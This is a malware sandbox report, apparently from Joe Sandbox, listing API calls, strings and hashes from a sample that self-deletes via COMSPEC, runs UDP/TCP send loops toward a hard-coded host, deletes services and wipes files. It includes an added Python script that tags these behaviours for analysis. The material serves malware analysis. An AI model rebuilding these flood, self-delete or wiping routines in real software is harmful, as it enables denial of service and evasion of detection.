                                • Opcode Fuzzy Hash: f244ac2fdfcf7e27f983d47bd2e476e1663f6f9b5c6e818040c90ec42e299550
                                • Instruction Fuzzy Hash: 6A1158B1121262DBFB105B16EE4CB573AA6F704319F00803AE544B62B2C7B90C54CF3E
                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00404EA9,Defghi Klmnopqr Tuv), ref: 00403523
                                • OpenServiceA.ADVAPI32(00000000,?,000F01FF,00000000,Defghi Klmnopqr Tuv), ref: 00403539
                                • DeleteService.ADVAPI32(00000000), ref: 0040354C
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00403553
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00403556
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandleOpen$DeleteManager
                                • String ID: Defghi Klmnopqr Tuv
                                • API String ID: 204194956-1553144822
                                • Opcode ID: 9417cfe2cc993b79d2e3b55ebb6b09adf650dad06d9114a354eaf94673a61dfb
                                • Instruction ID: af5df313aa315fefd4782f401c2454f72211a105aee6f81703237d9f712d2b62
                                • Opcode Fuzzy Hash: 9417cfe2cc993b79d2e3b55ebb6b09adf650dad06d9114a354eaf94673a61dfb
                                • Instruction Fuzzy Hash: 20E04F3564166177C2222B256D08F5B3B18AFC1B53F050425F741B65B48B78954195B9
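                                 The function listings above repeat a few patterns worth reading mechanically rather than by eye: WS2_32 and ADVAPI32 routines resolved at run time through LoadLibraryA/GetProcAddress (00406C10, 00406F0A, 0040816D, 00405898), a self-delete routine assembled from COMSPEC, "/c del " and "> nul" (00403571), UDP and TCP send loops behind socket/sendto/Sleep and socket/connect/send (00406E79, 00406F97), and a service removed through OpenSCManagerA/OpenServiceA/DeleteService (00403523). The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses the "APIs" bullets and the "String ID" line of one block into records, pairs each LoadLibraryA with the GetProcAddress that follows it, decodes the socket() arguments into Winsock constants, and emits behaviour tags. The three sample blocks are copied from the listings on this page. One assumption is the example's own: the second stack value printed on a LoadLibraryA line is taken to be the name later passed to GetProcAddress, which the report itself only shows as 00000000.

```python
import re

# Added example, not from the Joe Sandbox report: parse the "APIs" bullets of a function
# listing and derive the behaviour tags an analyst reads off them. Sample blocks are copied
# from this page; the LoadLibraryA/GetProcAddress pairing is an inference, not report data.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
STRING_ID_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<strings>.*)$")
AF, SOCK_TYPE = {2: "AF_INET"}, {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}   # socket() decoding
PROTO = {0: "default", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}


def parse_function_listing(text):
    """Return (calls, strings): calls are {api, mod, args, ref, sub} dicts in listing order
    ('sub' is the callee of a "Part of subcall function" line, else None); strings are the
    '$'-separated values of the "String ID:" line. Arguments are split on ','."""
    calls, strings = [], []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            raw = m.group("args")
            calls.append({"api": m.group("api"), "mod": m.group("mod"), "ref": m.group("ref"),
                          "sub": m.group("sub"),
                          "args": [a.strip() for a in raw.split(",")] if raw else []})
            continue
        m = STRING_ID_LINE.match(line)
        if m:
            strings = m.group("strings").split("$")
    return calls, strings


def resolved_imports(calls):
    """(dll, name) for each LoadLibraryA(dll, name, ...) directly followed by GetProcAddress.
    The second printed stack value is read as the name pushed for that GetProcAddress."""
    pairs = []
    for cur, nxt in zip(calls, calls[1:]):
        if (cur["api"] == "LoadLibraryA" and nxt["api"] == "GetProcAddress"
                and len(cur["args"]) >= 2 and cur["sub"] == nxt["sub"]):
            pairs.append((cur["args"][0], cur["args"][1]))
    return pairs


def decode_socket_calls(calls):
    """(ref, family, type, protocol) for each socket() call whose three arguments are literal."""
    out = []
    for c in calls:
        if (c["api"] == "socket" and len(c["args"]) == 3
                and all(re.fullmatch(r"[0-9A-F]{8}", a) for a in c["args"])):
            af, typ, proto = (int(a, 16) for a in c["args"])
            out.append((c["ref"], AF.get(af, af), SOCK_TYPE.get(typ, typ), PROTO.get(proto, proto)))
    return out


def is_subsequence(needle, haystack):
    """True if needle's items occur in haystack in that order, gaps allowed."""
    it = iter(haystack)
    return all(item in it for item in needle)


def flag_behaviours(calls, strings):
    """Behaviour tags for one block; subcall lines count only towards resolved imports."""
    apis = [c["api"] for c in calls if c["sub"] is None]
    tags = set()
    if any(dll.lower() == "ws2_32.dll" for dll, _ in resolved_imports(calls)):
        tags.add("dynamic-winsock-resolution")      # Winsock kept out of the static import table
    if ("GetEnvironmentVariableA" in apis and "ShellExecuteEx" in apis
            and "/c del " in strings and "> nul" in strings):
        tags.add("self-delete-via-comspec")         # %COMSPEC% /c del <own short path> > nul
    if is_subsequence(["OpenSCManagerA", "OpenServiceA", "DeleteService"], apis):
        tags.add("service-removal")
    for _, _, sock_type, _ in decode_socket_calls(calls):
        if sock_type == "SOCK_DGRAM" and "sendto" in apis and "Sleep" in apis:
            tags.add("udp-send-loop")
        if sock_type == "SOCK_STREAM" and "connect" in apis and "send" in apis:
            tags.add("tcp-send-loop")
    return tags


SELF_DELETE = """\
• GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
• GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
• ShellExecuteEx.SHELL32(0000003C), ref: 00403675
• GetCurrentThread.KERNEL32 ref: 0040369B
• String ID: > nul$/c del $<$COMSPEC$Defghi Klmnopqr Tuv$KERNEL32.dll$O$e$lstrcatA$n$p
"""
FLOOD = """\
  • Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,76F8F550,76F90BD0,00404875,chinagov.8800.org), ref: 00406C1C
  • Part of subcall function 00406C10: GetProcAddress.KERNEL32(00000000), ref: 00406C23
• socket.WS2_32(00000002,00000002,00000000), ref: 00406E79
• sendto.WS2_32(00000000,?,-00000401,00000000,?,00000010), ref: 00406EC6
• Sleep.KERNEL32(00000014), ref: 00406ECD
• socket.WS2_32(00000002,00000001,00000006), ref: 00406F97
• connect.WS2_32(00000000,?,00000010), ref: 00406FA7
• send.WS2_32(00000000,?,00000800,00000000), ref: 0040702E
"""
SERVICE = """\
• OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00404EA9,Defghi Klmnopqr Tuv), ref: 00403523
• OpenServiceA.ADVAPI32(00000000,?,000F01FF,00000000,Defghi Klmnopqr Tuv), ref: 00403539
• DeleteService.ADVAPI32(00000000), ref: 0040354C
"""

if __name__ == "__main__":
    for name, block in (("00403571", SELF_DELETE), ("00406E79", FLOOD), ("00403523", SERVICE)):
        print(name, sorted(flag_behaviours(*parse_function_listing(block))))
```

                                 Running the file prints the tags for the three embedded blocks. Arguments are split on commas, so a string argument that itself contains a comma (the time-zone names in the SendMessageA listing further down this page) is split as well; only leading positional values are used here, so that does not affect the tags.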
                                APIs
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00404D28,0000001A), ref: 00406BDB
                                • GetProcAddress.KERNEL32(00000000), ref: 00406BE2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: Defghi Klmnopqr Tuv$GetTickCount$KERNEL32.dll
                                • API String ID: 2574300362-1458725802
                                • Opcode ID: 6b3510431a1f1d43bc199626c34209ae12acd185543041aa9819738d571691f0
                                • Instruction ID: e2b8e24bfa267fa6e9ec36e760088df98f66f050865d098ef55141e691ac327e
                                • Opcode Fuzzy Hash: 6b3510431a1f1d43bc199626c34209ae12acd185543041aa9819738d571691f0
                                • Instruction Fuzzy Hash: 69D02272A802129BD30033BADF0FACA7AA99AC83553048037B084F24B4DF38C4404798
                                APIs
                                • select.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00403798
                                • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 004037B1
                                • recv.WS2_32(00000000,?,00000008,00000000), ref: 004037CA
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: recvselect
                                • String ID: Defghi Klmnopqr Tuv
                                • API String ID: 741273618-1553144822
                                • Opcode ID: 9210cb308e33c3465702e112dd41e11aff726b02e6877597e9f704787e0b536c
                                • Instruction ID: d88939a34068f27b08009573b9ec192b3f1388868b9ca5f3c15b88e7a2eb2fcd
                                • Opcode Fuzzy Hash: 9210cb308e33c3465702e112dd41e11aff726b02e6877597e9f704787e0b536c
                                • Instruction Fuzzy Hash: 3711A1F16002146BDB209E688DC5FE67AAC9B043A1F508636FA19E71D0E274DE808B94
                                APIs
                                • strcmp.MSVCRT ref: 00406731
                                • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 0040676F
                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040678E
                                • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 004067C5
                                • sprintf.MSVCRT ref: 004068CD
                                • _mbscpy.MSVCRT(-00000023,?,?,?,?,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 004068E7
                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000001,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040693E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Table$??2@??3@_mbscpysprintfstrcmp
                                • String ID: %u Gbps$KVa7
                                • API String ID: 3420875952-2796686009
                                • Opcode ID: 2e6fa44a5d2f037096ad7b5d024fbd0ea36ba1bcc104164832898df47580a20a
                                • Instruction ID: a7a8e1041bd709416f2cdac98afc023946ef9f584d3dcb890be07267fec2ea1a
                                • Opcode Fuzzy Hash: 2e6fa44a5d2f037096ad7b5d024fbd0ea36ba1bcc104164832898df47580a20a
                                • Instruction Fuzzy Hash: 18210E70A005158BD72ECB04CE94BA9B3BAFB94309F0941FDE10EAB6E5D6356F918F44
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00402A46
                                • GetProcAddress.KERNEL32(00000000), ref: 00402A4D
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: WS2_32.dll$htons
                                • API String ID: 2574300362-178149120
                                • Opcode ID: d30d6111be414e93e59afff5acc367f2655241c9da2ea0a2795162f196827327
                                • Instruction ID: 2561ae12f7e90b5fc780e89bc5807c04a20d660f8c717e8047036cfcaa43c05d
                                • Opcode Fuzzy Hash: d30d6111be414e93e59afff5acc367f2655241c9da2ea0a2795162f196827327
                                • Instruction Fuzzy Hash: BBC09BB5551280EBC7006B719F0D5453994B6047017100077F141F15F1DB7800409F1D
                                APIs
                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040868A
                                • htons.WS2_32 ref: 004086B2
                                • connect.WS2_32(00000000,?,00000010), ref: 004086C5
                                • closesocket.WS2_32(00000000), ref: 004086D1
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: closesocketconnecthtonssocket
                                • String ID:
                                • API String ID: 3817148366-0
                                • Opcode ID: 0a2ed5afde3e2c3bda8bc7a891d523bcba82ca95b19b28c83635fe27b66edda0
                                • Instruction ID: b5f64500789357e91306605df317961a8cc373726e32a30d19d3821c8ed13c85
                                • Opcode Fuzzy Hash: 0a2ed5afde3e2c3bda8bc7a891d523bcba82ca95b19b28c83635fe27b66edda0
                                • Instruction Fuzzy Hash: 02F062349042206BD600EB6C9D46BEB76A4EF89370F804B59FAB9A62E1E775440447DA
                                APIs
                                  • Part of subcall function 00459941: KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E
                                  • Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF
                                • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 0043308A
                                  • Part of subcall function 004306A0: RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
                                  • Part of subcall function 004306A0: GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF
                                • RegQueryValueExA.KERNEL32(00000000,DigitalProductId,00000000,00000000,?,?,00465CDE), ref: 00433117
                                • SystemTimeToVariantTime.OLEAUT32(00263B80,?), ref: 00433856
                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00433898
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-12:00) International Date Line West), ref: 004338AD
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-11:00) Midway Island), ref: 004338C2
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-10:00) Hawaii), ref: 004338D7
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-09:00) Alaska), ref: 004338EC
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-08:00) Pacific time (US & Canada)), ref: 00433901
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-07:00) Mountain time (US & Canada)), ref: 00433916
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-06:00) Central time (US & Canada)), ref: 0043392B
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-05:00) Eastern time (US & Canada)), ref: 00433940
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-04:00) Atlantic time (Canada)), ref: 00433955
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-03:00) Brasilia), ref: 0043396A
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-02:00) Mid-Atlantic), ref: 0043397F
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-01:00) Cape Verde Is.), ref: 00433994
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+00:00) Greenwich Mean Time), ref: 004339A9
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+01:00) West Central Africa), ref: 004339BE
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+02:00) Vilius, Jerusalem), ref: 004339D3
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+03:00) Baghdad, Moscow), ref: 004339E8
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+04:00) Abu Dhabi), ref: 004339FD
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+05:00) Islamabad), ref: 00433A12
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+06:00) Almaty), ref: 00433A27
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+07:00) Bangkok, Hanoi, Krasnoyask), ref: 00433A3C
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+08:00) Beijing, Hong Kong), ref: 00433A51
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+09:00) Seoul, Tokyo), ref: 00433A66
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+10:00) Brisbane, Melbourne, Sydney), ref: 00433A7B
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+11:00) Solomon Is.), ref: 00433A90
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+12:00) Fiji), ref: 00433AA5
                                • GetTimeZoneInformation.KERNEL32(?), ref: 00433AAF
                                • SendMessageA.USER32(?,0000014E,-0000000C,00000000), ref: 0043432F
                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00435143
                                • SendMessageA.USER32(?,00000143,00000000,?), ref: 0043518C
                                • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0043520B
                                • SendMessageA.USER32(?,0000014E,FFFFFFFF,00000000), ref: 0043545D
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: MessageSend$Time$Open$CallbackDispatcherErrorInformationItemLastQuerySystemUserValueVariantZone
                                • String ID: !$#$$$%$&$($(GMT$(GMT+$(GMT+00:00) Greenwich Mean Time$(GMT+01:00) West Central Africa$(GMT+02:00) Vilius, Jerusalem$(GMT+03:00) Baghdad, Moscow$(GMT+04:00) Abu Dhabi$(GMT+05:00) Islamabad$(GMT+06:00) Almaty$(GMT+07:00) Bangkok, Hanoi, Krasnoyask$(GMT+08:00) Beijing, Hong Kong$(GMT+09:00) Seoul, Tokyo$(GMT+10:00) Brisbane, Melbourne, Sydney$(GMT+11:00) Solomon Is.$(GMT+12:00) Fiji$(GMT-01:00) Cape Verde Is.$(GMT-02:00) Mid-Atlantic$(GMT-03:00) Brasilia$(GMT-04:00) Atlantic time (Canada)$(GMT-05:00) Eastern time (US & Canada)$(GMT-06:00) Central time (US & Canada)$(GMT-07:00) Mountain time (US & Canada)$(GMT-08:00) Pacific time (US & Canada)$(GMT-09:00) Alaska$(GMT-10:00) Hawaii$(GMT-11:00) Midway Island$(GMT-12:00) International Date Line West$)$0000$00000401$00000402$00000404$00000405$00000406$00000407$00000408$00000409$0000040B$0000040C$0000040D$0000040E$00000410$00000411$00000412$00000413$00000414$00000415$00000416$00000418$00000419$0000041A$0000041B$0000041C$0000041D$0000041E$0000041F$00000421$00000422$00000423$00000424$00000425$00000426$00000427$00000429$0000042A$00000439$0000043E$0000043F$00000440$00000441$0000044B$00000450$0000045A$00000465$00000801$00000804$00000807$00000809$0000080A$0000080C$00000810$00000813$00000816$0000081A$0000081D$0000083E$00000C01$00000C04$00000C07$00000C09$00000C0A$00000C0C$00000C1A$00001001$00001004$00001007$00001009$0000100A$0000100C$00001401$00001404$00001407$00001409$0000140A$0000140C$00001801$00001809$0000180A$0000180C$00001C01$00001C09$00001C0A$00002001$00002009$0000200A$00002401$00002409$0000240A$00002801$00002809$0000280A$00002C01$00002C09$00002C0A$00003001$00003009$0000300A$00003401$00003409$0000340A$00003801$0000380A$00003C01$00003C0A$00004001$0000400A$0000440A$0000480A$00004C0A$0000500A$:00) $Albanian(Albania)$Arabic(Algeria)$Arabic(Bahrain)$Arabic(Egypt)$Arabic(Iraq)$Arabic(Jordan)$Arabic(Kuwait)$Arabic(Lebanon)$Arabic(Libya)$Arabic(Morocco)$Arabic(Oman)$Arabic(Qatar)$Arabic(Saudi Arabia)$Arabic(Syria)$Arabic(Tunisia)$Arabic(United Arab Emirates)$Arabic(Yemen)$BCDFGHJKMPQRTVWXY2346789$Belarusian(Belarus)$Bulgarian(Bulgaria)$C$Chinese(China)$Chinese(Hong Kong SAR)$Chinese(Macau SAR)$Chinese(Singapore)$Chinese(Taiwan)$Croatian(Croatia)$Czech(Czech Republic)$Danish(Denmark)$Default$Dhivehi(Maldives)$DigitalProductId$Dutch(Belgium)$Dutch(The Netherlands)$English(Australia)$English(Belize)$English(Canada)$English(Caribbean)$English(Ireland)$English(Jamaica)$English(New Zealand)$English(Philippines)$English(South Africa)$English(Trinidad and Tobago)$English(United Kingdom)$English(United States)$English(Zimbabwe)$Estonian(Estonia)$Farsi(Iran)$Finnish(Finland)$French(Belgium)$French(Canada)$French(France)$French(Luxembourg)$French(Monaco)$French(Switzerland)$German(Austria)$German(Germany)$German(Liechtenstein)$German(Luxembourg)$German(Switzerland)$Greek(Greece)$Hebrew(Israel)$Hindi(India)$Hungarian(Hungary)$Indonesian(Indonesia)$InstallDate$Italian(Italy)$Italian(Switzerland)$Japanese(Japan)$Kannada(India)$Kazakh(Kazakhstan)$Korean(Korea)$Kyrgyz(Kazakhstan)$Latvian(Latvia)$Lithuanian(Lithuania)$Malay(Brunei)$Malay(Malaysia)$Mongolian(Mongolia)$Norwegian(Norway)$Polish(Poland)$Portuguese(Brazil)$Portuguese(Portugal)$Romanian(Romania)$Russian(Russia)$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\Control\Keyboard Layouts\$SYSTEM\CurrentControlSet\Control\Nls\Language$Serbian(Cyrillic)$Serbian(Latin)$Slovak(Slovakia)$Slovenian(Slovenia)$Spanish(Argenuser)$Spanish(Bolivia)$Spanish(Chile)$Spanish(Colombia)$Spanish(Costa Rica)$Spanish(Dominican Republic)$Spanish(Ecuador)$Spanish(El Salvador)$Spanish(Guatemala)$Spanish(Honduras)$Spanish(Mexico)$Spanish(Nicaragua)$Spanish(Panama)$Spanish(Paraguay)$Spanish(Peru)$Spanish(Puerto Rico)$Spanish(Spain)$Spanish(Uruguay)$Spanish(Venezuela)$Swahili(Kenya)$Swedish(Finland)$Swedish(Sweden)$Syriac(Syria)$Thai(Thailand)$Turkish(Turkey)$Ukrainian(Ukraine)$Vietnamese(Vietnam)$wwww
                                • API String ID: 3508335397-1490658257
                                • Opcode ID: 627a35e1b08555edaf0af8ad1688b17534d88a004a0355c9889eb5397b03b424
                                • Instruction ID: 11e6bca3a7b78fddd481d42fe835fe7653ca2f41bf506d87efe11ac05451b3a8
                                • Opcode Fuzzy Hash: 627a35e1b08555edaf0af8ad1688b17534d88a004a0355c9889eb5397b03b424
                                • Instruction Fuzzy Hash: 7233E275300B00AFC354DF2DC895F5A73E5AFC8718F10861EF85A9B2D2CB78A9468B59
                                APIs
                                • FindFirstFileA.KERNEL32(?,?,\*.*,00000004,?,?), ref: 0040530E
                                • GetFileAttributesA.KERNEL32(?,?,?,0000005C,?,?), ref: 00405423
                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405432
                                • RemoveDirectoryA.KERNEL32(?), ref: 0040544C
                                • DeleteFileA.KERNEL32(?), ref: 0040547E
                                • FindNextFileA.KERNEL32(?,?), ref: 0040548E
                                • FindClose.KERNEL32(?), ref: 004054A1
                                Strings
                                Similarity
                                • API ID: File$Find$Attributes$CloseDeleteDirectoryFirstNextRemove
                                • String ID: \*.*$desktop.ini$index.dat
                                • API String ID: 799748605-3685876507
                                • Opcode ID: 80584bf7c0bad225ea78bdcef72c35823c7484b3c5839c582d24ccd8dfbf2b61
                                • Instruction ID: 0650860c3c1e2d53bc6fffd3340b65124f85220920b4efda78b7a122019db1cc
                                • Opcode Fuzzy Hash: 80584bf7c0bad225ea78bdcef72c35823c7484b3c5839c582d24ccd8dfbf2b61
                                • Instruction Fuzzy Hash: D881C170104B429FD310CB24CC48BABB7A8EF85355F148A6EF855972D1EB79D809CF5A
                                APIs
                                • __EH_prolog.LIBCMT ref: 0045B056
                                • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 0045B080
                                • lstrcpynA.KERNEL32(?,?,00000104), ref: 0045B091
                                  • Part of subcall function 0045B00F: lstrcpynA.KERNEL32(00000000,?,00000104,0045B0C3,?,?), ref: 0045B034
                                  • Part of subcall function 0045B00F: PathStripToRootA.SHLWAPI(00000000), ref: 0045B03B
                                • PathIsUNCA.SHLWAPI(?,?,?), ref: 0045B0C6
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0045B0EA
                                • CharUpperA.USER32(?), ref: 0045B102
                                • FindFirstFileA.KERNEL32(?,?), ref: 0045B11B
                                • FindClose.KERNEL32(00000000), ref: 0045B127
                                • lstrlenA.KERNEL32(?), ref: 0045B144
                                • lstrcpyA.KERNEL32(?,?), ref: 0045B163
                                Similarity
                                • API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
                                • String ID:
                                • API String ID: 4080879615-0
                                • Opcode ID: deeb7901bc9a1c9402ce5623d21999b15f3dcde8d64849d450898d991a24d1a0
                                • Instruction ID: 1ff96bb8ef7605f0caa5a4dd8548b9a5efde3f4e5f2b52bc8e945bc090aef529
                                • Opcode Fuzzy Hash: deeb7901bc9a1c9402ce5623d21999b15f3dcde8d64849d450898d991a24d1a0
                                • Instruction Fuzzy Hash: 70318171500518EBCB109F64CC88AEF7B78EF4475AF0045AAF915D6251D7788D888F99
                                APIs
                                • #17.COMCTL32(?,?,?,?,?,0046429C,000000FF), ref: 00439D71
                                  • Part of subcall function 0045FE1A: InterlockedExchange.KERNEL32(004D986C,?), ref: 0045FE46
                                • __time32.LIBCMT ref: 00439D87
                                  • Part of subcall function 0044808D: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00448096
                                  • Part of subcall function 0044808D: __aulldiv.LIBCMT ref: 004480B6
                                  • Part of subcall function 004306A0: RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
                                  • Part of subcall function 004306A0: GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF
                                • FindFirstFileA.KERNEL32(?,?,SystemRoot,?,00000000,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,004C7468), ref: 00439E18
                                Strings
                                Similarity
                                • API ID: FileTime$ErrorExchangeFindFirstInterlockedLastOpenSystem__aulldiv__time32
                                • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion$SystemRoot$\system32\winbws.bat
                                • API String ID: 3390870601-281878756
